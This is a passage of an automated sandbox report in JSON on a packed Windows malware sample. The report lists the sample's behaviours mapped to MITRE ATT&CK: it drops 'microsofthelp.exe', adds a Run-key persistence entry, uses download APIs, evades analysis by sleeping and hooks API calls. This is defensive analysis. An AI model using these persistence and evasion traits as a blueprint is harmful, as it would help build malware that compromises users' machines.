\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter HelpPane.exe (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter hh.exe (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-118", "type": 2, "relevance": 1, "name": "Contains ability to query network adapter information (API string)", "description": "Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"microsofthelp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-453", "type": 2, "relevance": 1, "name": "Contains ability to set options for internet handles (API string)", "description": "Found reference to API \"InternetSetOptionExA\" (Indicator: \"InternetSetOption\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"InternetSetOptionExA\" (Indicator: \"InternetSetOption\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"InternetSetOptionExA\" (Indicator: \"InternetSetOption\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"se;.wsf;.ws\"\n Heuristic match: \"esktop\\zrogram.kg\"\n Heuristic match: \"microsoft.net\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"13487951623,5800,3221,,InternetOpenA,Wininet.dll,\"252:02:44.994\",RX=0,PX=0\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005804.00000001.67745.005F0000.00000004.mdmp, 00000000-00005804.00000002.69667.005F0000.00000004.mdmp, 00000000-00005804.00000003.75108.005F0000.00000004.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"13487951623,5800,3221,,InternetOpenA,Wininet.dll,\"252:02:44.994\",RX=0,PX=0\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005804.00000001.67745.005F0000.00000004.mdmp, 00000000-00005804.00000002.69667.005F0000.00000004.mdmp, 00000000-00005804.00000003.75108.005F0000.00000004.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"microsofthelp.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has an entrypoint in section \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an entrypoint in section \".MPRESS1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegOpenKeyA\n RegCloseKey\n RegOpenKeyExA\n RegCreateKeyA\n GetModuleFileNameA\n LoadLibraryA\n GetFileSize\n DeleteFileA\n GetProcAddress\n CreateThread\n FindFirstFileA\n WriteFile\n TerminateProcess\n CreateProcessA\n Sleep\n CreateFileA\n GetTickCount\n InternetReadFile\n InternetOpenUrlA\n InternetCloseHandle\n InternetOpenA", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MICROSOFTHELP\"; Value: \"%WINDIR%\\microsofthelp.exe\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"microsofthelp.exe.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]\n \"microsofthelp.exe\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- Location: [%WINDIR%\\microsofthelp.exe]- [targetUID: 00000000-00005804]\n \"MICROSOFTHELP.EXE.67A47CD0.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" wrote 21722 bytes starting with PE header signature to file \"C:\\Windows\\microsofthelp.exe\": 4d5a40000100000002000000ffff0000ff000000000000000a000000000000000e1fff0e00ff09ff21ff014cff2157696e3332202e4558452e0d0a2440000000504500004c010300ffff174f0000000000000000ff000f030b010600003800000038000000000000001000000010000000500000000040000010000000020000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-77", "relevance": 10, "name": "PE file is packed with MPress Packer", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has a section named \".MPRESS1\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has a section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has a section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has a section named \".MPRESS2\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-47", "type": 6, "relevance": 10, "name": "Possibly tries to evade analysis by sleeping many times", "description": "\"microsofthelp.exe\" (Thread ID: 5800) slept \"525\" times (threshold: 500)", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"microsofthelp.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%WINDIR%\\microsofthelp.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"Process32NextW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CopyFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindResourceA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadResource@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CreateProcessW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"WinExec@KERNEL32.DLL\" in 